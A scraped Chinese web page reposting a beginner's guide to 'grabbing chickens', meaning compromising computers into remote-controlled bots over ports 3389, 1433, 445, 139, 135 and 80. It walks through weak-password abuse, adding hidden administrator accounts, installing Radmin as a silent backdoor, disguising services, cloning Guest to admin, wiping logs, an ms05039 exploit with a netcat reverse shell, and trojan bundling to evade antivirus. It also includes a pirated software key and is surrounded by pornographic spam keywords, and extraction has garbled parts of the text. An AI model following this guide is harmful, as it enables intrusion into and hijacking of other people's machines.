• <em id="6vhwh"><rt id="6vhwh"></rt></em>

    <style id="6vhwh"></style>

    <style id="6vhwh"></style>
    1. <style id="6vhwh"></style>
        <sub id="6vhwh"><p id="6vhwh"></p></sub>
        <p id="6vhwh"></p>
          1. 国产亚洲欧洲av综合一区二区三区 ,色爱综合另类图片av,亚洲av免费成人在线,久久热在线视频精品视频,成在人线av无码免费,国产精品一区二区久久毛片,亚洲精品成人片在线观看精品字幕 ,久久亚洲精品成人av秋霞

            新手抓雞方法大全

            更新時間:2023-11-18 13:34:05 閱讀: 評論:0

            閱讀讓我快樂-小號的英文

            新手抓雞方法大全
            2023年11月18日發(作者:隱形貧困人口)

            新手抓雞方法大全

            2009-09-09 01:02

            抓雞很多人都會,但不一定全會,今天,我對所有方法做總結,也會介紹!

            首先是端口抓雞,一般比較常用!有33891433445139135

            3389端口抓雞

            工具:WINNTAutoAttack自動攻擊器(掃漏洞);SQLTOOLSSA空口令連接器);

            RAMDIN影子3.0中文版(遠程控制程序)(RADMIN注冊碼:

            08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA

            6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);

            (隱藏3389服務及不讓管理發現自己程序);(小

            榕的擦PP程序);(開3389端口服務的);(使用被禁止的

            Guest帳戶要用到的);(遠程桌面連接程序)。

            .掃到SA弱口令(自動攻擊器)

            .SQLTOOLS連上去建一個用戶

            net start telnet

            telnet服務

            net ur mint mint /add

            添加用戶mint密碼為

            mint net localgroup administrators mint /add

            將帳號mint升級為管理員

            .上傳后門程序(RADMIN服務端自解壓程序)

            制作過程:

            1、到Radmin安裝目錄下找到 r_

            2、在本地設置服務端(一定要生成);

            設置密碼-->>設置連接端口(默認4489)-->>生成

            3、導出注冊表HKEY_LOCAL_MACHINESYSTEMRadmin的鍵值為

            4、編寫一個批處理,并命名為

            @echo offnet stop r_rver

            5、寫第二個批處理,,內容為:

            @echo [url=mailto:off@]off@[/url] /

            uninstall /silence@ /install /

            silence@regedit /s @echo

            [url=mailto:off@]off@[/url] /uninstall /

            [url=mailto:silence@]silence@[/url] /install

            /silence@regedit /

            s @net start r_rver@del

            @del @del @del

            6、將 (r_改名)

            壓縮成壓縮包;

            7、將制作成自解壓文件;

            選擇的自釋放模塊-->>高級自釋放選項

            -->>常規

            釋放路徑:%systemroot%system32

            安裝程序:釋放后運行: 釋放前運行

            -->>摸式

            緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件

            -->>確定-->>確定

            生成完成。

            .RADMIN客服端連接

            上傳文件到c:WINNT(XPwindows):

            (如果是在XP下,這個要把里面的WINNT改為Windows)

            最好再上傳一個反彈后門RADMIN進入TELNET

            運行c:,重啟肉雞。

            .重啟后用遠程桌面遠程器連上去

            這里就有時會出現個問題。

            使用3389登陸,發現登陸用戶已滿,不用怕,我們把他踢出去。

            telnet對方ip,發現需要 NTLM 身份驗證。我們在自己的電腦里建立一個帳號

            mint密碼為mint身份為管理員。

            找到c: 建立一個快捷方式到桌面。修改cmd的快捷

            方式屬性為允許其他身份登陸。然后運行桌面上的的快捷方式。輸入帳

            mint密碼minttelnet對方ip,直接可以登陸對方電腦了。

            使用命令:

            c:query ur (查看對方目前終端登陸狀況。)

            運行命令:

            c:logoff 1(踢出去一個管理者)

            再用c:query ur檢查一便~~(這就是為什么不馬上用)

            .連上后..cmd下運行

            c:winntlog . 自己的IP .(PP)

            c: (刪除覆蓋查看當前在線用戶文件)

            .SA空口令補丁

            程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)

            -->>Windowst身位驗證登陸

            復制一下代碼:SELMIS

            if exists (lect * from ects where id

            = object_id(N’[dbo].[xp_cmdshell]’)

            and OBJECTPROPERTY(id, N’IsExtendedProc’)

            = 1) exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’GO

            F5(運行),關了退出SQL Server再用SQL Server身位驗證進一次,退出(

            是為了不留下記錄)

            .3389端口和服務名稱

            修改服務器端的端口設置,注冊表有2個地方需要修改。

            [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal

            ServerWdsrdpwdTdstcp]PortNumber值,默認是3389,選擇10進制,修

            改成所希望的端口,比如1314

            第二個地方:

            [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal

            ServerWinStationsRDP-Tcp] PortNumber值,默認是3389,選擇10進制,

            修改成所希望的端口,比如1314

            要重啟系統才能用新端口連。(不急..改了他的服務名再重啟系統吧)

            導出3389服務的

            [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]

            的鍵值為文件。編輯文件,替換TermServiceAlerter(錯誤

            警告服務..別的服務也行) 。再把第十行的"Description"="(這里是服務說明,

            改為你所換的服務說明,這里改為通知所選用戶和計算機有關系統管理級警

            報。)"第十一行的"DisplayName"="(這里是服務名稱,改為你所換的服務名稱,

            這里改為Alerter)保存,再導入注冊表(這里要先運行(可在CMD

            下打這命令)服務管理器..Alerter的服務先停止)

            再在CMD

            CD c:winnt

            system32 copy

            (這里是復制Alerter服務文件名差不多的文件)

            CD C:winnt sc 127.0.0.1 config Alerter binpath=

            c:

            (這里是從新定向Alerter服務文件.服務名一定要區分大小寫A要大寫)

            .注消后(注消比直接關要好些)Radmin重啟肉雞

            .使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號

            1.使用展開注冊表到

            HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrs

            用法:[psu -p regedit -i pid]

            Pid 的值為在任務欄空白處點右鍵-->>任務管理器--->>進程中的

            后面的數值就是PID數值。

            如:psu p regedit i 157

            Guest克成管理員權限,克成管理員權限的方法:

            找到

            HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrsNamesAdministrator

            的類型值。

            HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrs下找到這個類型值

            在復制數值名為F的數值數劇覆蓋相應的Guest的類型值(找的方法一樣)

            導出Guest的配置(也就是導出

            HKEY_LOCAL_MACHINESAMSAMDomainsAccountUrsGuest和他相應的類型

            值的數據),然后刪除Guest的配置。

            2.查看計算機管理中帳戶列表,刷新這時候會出現錯誤[找不到帳戶](跳過這步

            也行)

            3.Guest的配置(二個REG文件導進注冊表)

            4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]

            net ur Guest ****

            [修改密碼]net ur Guest /

            active:yesnet ur Guest /active:no[命令行下禁用Guest]

            5.實驗被禁止的帳戶Guest是否可用。

            6.Guest登陸后刪除自己建的帳號。

            net ur mint /del

            3389抓雞較為簡單,適合初學者

            1433端口抓雞

            用到工具:弱口令掃描器、X-scanSQL綜合利用工具、一個木馬

            先選擇IP段,

            掃描出開放了1433端口的電腦,

            然后用X-scan掃出弱口令,

            用弱口令使用SQL綜合利用工具傳馬

            445端口抓雞

            第一步,我們需要做的是確定一臺存在445端口漏洞的主機。可以用掃描工具掃

            描得到!比如SUPERSCAN這個端口掃描工具。

            第二步,假設現在我們已經得到一臺存在445端口漏洞的主機,那么我們就可以

            利用瑞士軍刀nc和溢出工具ms05039進行攻擊:

            F:445>ms05039 目標IP 本地IP 1234

            F:445> -vv -l -p 1234

            成功的話,就會返回一個shell,然后就可以用我們常用的命令了。比如讓他去

            下載我們的木馬或上傳一個木馬給他,然后運行,這樣得到一只肉雞的CDMSHELL

            了。

            139端口抓雞

            需要肉雞開放139端口與IPC$共享,算是比較老的漏洞了,現在不怎么常用

            net u 192.168.0.1ipc$ "" /ur:administrator

            連接的命令是:

            net<空格>u<空格>IP地址ipc$<空格>密碼<空格>/ur:用戶名

            假設我要連接的目標IP地址是:192.168.1.11,用戶名是google,使用的密碼

            123456,那么連接對方139端口通道的格式就是這樣的:

            net u 192.168.1.11ipc$ 123456 /ur:google 如果連接成功,那么

            系統會提示"命令成功完成"!

            空密碼是這樣的:

            如果密碼是空的,那就在原先輸入密碼的地方以""代替。

            開始查看權限:

            查看登錄后用戶權限的方法很簡單,只要給目標系統傳個文件就可以了,如果傳

            誦成功,那么一般都是系統管理員權限了,如果不成功可能就是來訪者權限或者

            其他用戶組的。命令的格式是這樣的:

            copy<>文件絕對路徑<>IP地址文件目標路徑

            比如我要將本地C盤下的文件拷貝到192.168.1.11D盤下:

            copy c: 192.168.1.11d$

            要注意"$"符,那是隱藏共享盤的表示符,如果對方的共享盤不是隱藏的,就不

            需要"$"符了。如果命令執行成功,系統同樣會提示"已復制 1 個文件"

            135端口抓雞

            大家肯定不陌生,還是比較多人用的,教程也有很多,全自動抓的工具也很多,

            就簡單介紹一下,

            首先自己電腦要開放相應服務

            用掃描器掃出開放了135端口的電腦

            然后用NT-scan掃描弱口令

            Recton進行開肉雞23端口

            開完后我們就TELNET命令連接肉雞`

            好了`成功拿到CMD權限``

            下面我們共享它的C`輸入命令:net share c=c:/

            接著就是啊D網絡工具包傳馬,然后就肉雞上線了!

            還有80端口,其實就是掛網馬,

            首先用獲得某網站webshell,然后用網馬生成器生成,掛馬

            捆綁木馬抓雞

            在電影等文件中捆綁木馬,然后上傳到網站上,比如迅雷的雷區,只要免殺好,

            是不會報毒的!

            高超的近義詞是什么-班組管理

            新手抓雞方法大全

            本文發布于:2023-11-18 13:34:04,感謝您對本站的認可!

            本文鏈接:http://m.newhan.cn/zhishi/a/170028564494107.html

            版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。

            本文word下載地址:新手抓雞方法大全.doc

            本文 PDF 下載地址:新手抓雞方法大全.pdf

            標簽:抓雞工具
            相關文章
            留言與評論(共有 0 條評論)
               
            驗證碼:
            推薦文章
            排行榜
            Copyright ?2019-2022 Comsenz Inc.Powered by ? 實用文體寫作網旗下知識大全大全欄目是一個全百科類寶庫! 優秀范文|法律文書|專利查詢|
            主站蜘蛛池模板: 嫩草成人AV影院在线观看| 国产精品v片在线观看不卡| 国产精品片在线观看手机版| 久久精品蜜芽亚洲国产AV| 国产又爽又黄又爽又刺激| 亚洲人成色7777在线观看不卡| 国产91午夜福利精品| 久久无码中文字幕无码| 国产蜜臀av在线一区二区| 亚洲中文字幕在线精品一区| 国产精品久久久久aaaa| 日韩精品一区二区三区影院| 视频在线只有精品日韩| 中国女人高潮hd| 亚洲成人av在线高清| 久久热精品视频在线视频| 亚洲综合精品香蕉久久网| 在线看国产精品自拍内射| 女人与公狍交酡女免费| 疯狂做受xxxx高潮欧美日本| 国产乱子伦农村xxxx| 精品无码人妻一区二区三区不卡 | 国产又黄又爽又刺激的免费网址| av毛片免费在线播放| 国产午精品午夜福利757视频播放| 国产白嫩护士在线播放| 性欧美vr高清极品| 老妇free性videosxx| 国产最大的福利精品自拍| 男人av天堂专区| 日韩人妻久久精品一区二区| 久久国产精品老女人| 国产在线视频导航| 欧美激情综合色综合啪啪五月| 日韩中文字幕V亚洲中文字幕| 国产在线精品中文字幕| 亚洲中文字幕国产综合| 99久久99久久精品国产片| 色婷婷日日躁夜夜躁| 欧美性大战xxxxx久久久√| 18禁亚洲一区二区三区|